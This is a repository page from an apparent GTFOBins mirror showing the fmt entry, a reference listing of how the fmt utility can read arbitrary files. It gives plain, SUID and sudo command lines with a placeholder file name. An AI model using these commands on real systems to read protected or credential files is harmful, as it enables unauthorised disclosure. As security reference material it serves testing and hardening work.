This website requires JavaScript.
Explore
Help
Sign In
dash
/
GTFOBins.github.io
Watch
1
Star
0
Fork
0
You've already forked GTFOBins.github.io
Code
Issues
Pull Requests
Packages
Projects
Releases
Wiki
Activity
Files
d6895f367d8440f95d3cdd4624becf341684049f
GTFOBins.github.io
/
_gtfobins
/
fmt.md
Emilio Pinna
d6895f367d
Reorder functions in binaries
2018-07-04 19:26:52 +01:00
364 B
Raw
Blame
History
description, functions
description
functions
The read file content is not binary-safe.
file-read
suid-enabled
sudo-enabled
code
LFILE=file_to_read fmt -pNON_EXISTING_PREFIX "$LFILE"
code
LFILE=file_to_read ./fmt -pNON_EXISTING_PREFIX "$LFILE"
code
LFILE=file_to_read sudo fmt -pNON_EXISTING_PREFIX "$LFILE"
Reference in New Issue
View Git Blame
Copy Permalink